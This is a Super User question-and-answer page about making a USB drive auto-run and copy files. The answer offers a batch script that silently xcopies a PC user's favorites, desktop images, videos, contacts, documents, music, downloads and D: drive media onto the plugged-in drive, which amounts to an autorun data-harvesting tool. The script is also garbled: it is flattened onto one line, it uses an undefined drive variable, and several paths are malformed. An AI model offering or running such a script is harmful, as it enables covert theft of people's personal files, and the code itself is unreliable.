# USB Auto Find and Copy

Tags: usb, batch-file, file-transfer

How would someone write a program that when one plugs in an USB, it would auto run, find file names and copy them onto the USB? I have tried it several times with varying degrees of success but never full.

Answer (score -1):

you can create an autorun file which this code is in there to copy files from the PC.

```
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"
```

So if you switched the two codes in quotes it'll copy files from the USB. Like So.

```
%backupcmd% "%drive%\all\My pics" "%USERPROFILE%\pictures"
```

or you can try:

@echo on :: variables SET odrive=%odrive:~0,2% set backupcmd=xcopy /s /c /d /e /h /i /r /y echo on %backupcmd% "%USERPROFILE%\Favorites" "%drive%\backup\favorites" %backupcmd% "%USERPROFILE%\Desktop*.jpg" "%drive%\backup\img" %backupcmd% "%USERPROFILE%\Desktop*.jpeg" "%drive%\backup\img" %backupcmd% "%USERPROFILE%\Desktop*.bmp" "%drive%\backup\img" %backupcmd% "%USERPROFILE%\Desktop*.3gp" "%drive%\backup\vid" %backupcmd% "%USERPROFILE%\Desktop*.mp4" "%drive%\backup\vid" %backupcmd% "%USERPROFILE%\Desktop*.avi" "%drive%\backup\vid" %backupcmd% "%USERPROFILE%\Desktop*.wmv" "%drive%\backup\vid" %backupcmd% "%USERPROFILE%\Contacts" "%drive%\backup\contacts" %backupcmd% "%USERPROFILE%\Links" "%drive%\backup\links" %backupcmd% "%USERPROFILE%\My Documents\My Music" "%drive%\backup\mp3" %backupcmd% "%USERPROFILE%\My Documents\Downloads" "%drive%\backup\downloads" %backupcmd% "%USERPROFILE%\My Music" "%drive%\backup\mp3" %backupcmd% "%USERPROFILE%\My Documents*.jpg" "%drive%\backup\img" %backupcmd% "%USERPROFILE%\My Documents*.bmp" "%drive%\backup\img" %backupcmd% "%USERPROFILE%\My Documents*.avi" "%drive%\backup\vid" %backupcmd% "%USERPROFILE%\My Documents*.mpg" "%drive%\backup\vid" %backupcmd% "%USERPROFILE%\My Documents*.3gp" "%drive%\backup\vid" %backupcmd% "%USERPROFILE%\My Documents*.mp4" "%drive%\backup\vid" %backupcmd% "%USERPROFILE%\My Pictures" "%drive%\backup\img" %backupcmd% "%USERPROFILE%\Videos" "%drive%\backup\vid" %backupcmd% "%USERPROFILE%\Music" "%drive%\backup\mp3" %backupcmd% "%USERPROFILE%\Downloads" "%drive%\backup\downloads" %backupcmd% "D:*.jpg" "%drive%\backup\img" %backupcmd% "D:*.jpeg" "%drive%\backup\img" %backupcmd% "D:*.bmp" "%drive%\backup\img" %backupcmd% "D:*.3gp" "%drive%\backup\vid" %backupcmd% "D:*.mp4" "%drive%\backup\vid" %backupcmd% "D:*.avi" "%drive%\backup\vid" %backupcmd% "D:*.wmv" "%drive%\backup\vid" @echo on cls

Comment: So this will copy everything from the music, downloads, documents, pictures, and everything?>!?

Comment: like literally everything

Comment: you can edit it and replace with the files you need to be copied. use it as template

Comment: @Botmaster Please read https://superuser.com/editing-help#code, and [edit] your answer, formatting the code so it is 1) easy to read, 2) easier for others to copy and re-use.

Comment: ok sorry for that. am new :)

Comment: i tried to edit it, am not sure if its ok now?